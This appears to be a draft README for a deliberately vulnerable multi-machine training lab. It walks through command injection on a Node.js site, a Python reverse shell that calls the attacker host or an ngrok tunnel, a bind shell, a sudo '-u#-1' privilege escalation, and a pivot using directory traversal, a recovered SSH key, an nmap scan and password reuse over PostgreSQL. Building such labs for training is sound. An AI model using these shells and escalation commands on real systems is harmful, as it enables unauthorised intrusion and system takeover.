### CERBERE scenario (WIP)
### Installation
Follow the steps in the main README.md, then launch
```bash
cd src
python3 main.py ../scenarios/cerbere/scenario.json
```
```bash
cd output && vagrant up
```

The installation process may take 5/10 min (installing python 3.10 on machine zagreus is by far the longest step).

### Zagreus
- Access the website with [192.168.56.2:3000](192.168.56.2:3000) (might require http instead of https!).
- This machine hosts a node.js website executed as user *alice*, which is vulnerable to command injection.
- This command injection is accessible through the search function on the profile page, accessible after creating a profile.
- This vulnerability should be found with Burp?
- In particular this lets the attacker access a shell, for instance with 

```bash
nc -nlvp 888
```
on the host machine, and
```bash
hop | python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
```
on the website injection when used locally.
- If you want to exploit the exploit remotely, you will need to either use ngrok or a bind shell instead.
#### Ngrok method
- Make a ngrok account and install it on your machine. You will need to verify your email address.
- Then run both these commands on different terminals on the attacker machine
```bash
./ngrok tcp 12345
```

```bash
nc -nlvp 12345
```
- The ngrok window will now give you an url and port, for instance *6.tcp.eu.ngrok.io 18121*
- Run the above bash python script, replacing the ip and port with those values.

#### Bind shell method
DOES NOT WORK REMOTELY YOU CANT ACCESS THE IP.
- On the website run
```bash
hop | python3 -c 'import socket,os,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("0.0.0.0",8888));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
```
- Then on your attacker machine
```bash
nc 192.168.56.2 8888
```
- An other method would be to use the upload function to add a script opening a remote shell, then executing the script through the search command.
- If the profile "test" was created, any images uploaded will be in the ./public/images/test/ repository.
- You may also have to use chmod to give it execution privileges

- For now,the privilege escalation comes through the form of the sudo 1.8.27 package being flawed.
- If this is the case, the sudoers file will have been edited to allow alice to execute commands as anyone except root.
- This can be bypassed with sudo -u#-1 command.
- For instance, to acess a file you're not supposed to:
```bash
sudo -u#-1 cat .bash_history
```
- But you can also just open a shell with root privileges
```bash
sudo -u#-1 /bin/bash
```

- This machine will contain a password, either in a txt file or in the bash history of the superuser.
- It is possible to find the superuser by checking the /etc/passwd file or just the /home directory.
- This machine will contain a password to be reused to access Hades.

### Hades
- Access the website with [192.168.56.3:8000](192.168.56.2:8000) (might require http instead of https!).
- This machine hosts a django website executed as user *bob*, which will be vulnerable to a directory traversal.
- This will also let attackers reuse credentials acquired in machine Zagreus.
- A SSH key may be found in the /notes/ directory.
- This SSH key may be used to access the superuser privileged account. This however has to be done from the internal network, aka machine zagreus.
- The key is a single line on the notes directory, and needs to be converted back to the proper key format.
- Open your favorite text editor (I use atom) and replace every space with a new line.
- The note also contains information about the user.
- The bash we get from the command injection is a bit janky (can't use CTRL commands, so can't use nano), making it annoying to paste the key there.
- You can still however copy paste things using right click. It also seems possible to upgrade this shell but I haven't tried it.
- Since you have root access on zagreus, you can install nmap there and run a scan on the local network.
- You can get the ip of the local network using the *ip a* command, which will give you the local ip of zagreus.
- For instance, if the local zagreus ip is 10.35.60.12, the subnetwork will be 10.35.60.0/24.
- You may thus run (from a root shell on zagreus)
```bash
sudo apt install nmap
nmap 10.35.60.0/24 -vv
```
- This will give you the ips of hades and melinoe and their open ports. Use the hades IP to access it through ssh.
```bash
touch key
echo 'COPY_PASTE_YOUR_KEY_HERE' >> key
chmod 600 key 
ssh superuser@HADES_IP -i key
```
- Once logged in, find an other username + password in either a text file or the bash history.


### Melinoe
- Hades comes with psql pre-installed (it'd make sense for an admin there to have it).
- Access the machine through its open postgresql service using the password you found before.
```bash 
psql -h 192.168.56.4 -p 5432 -U melinoe 
```
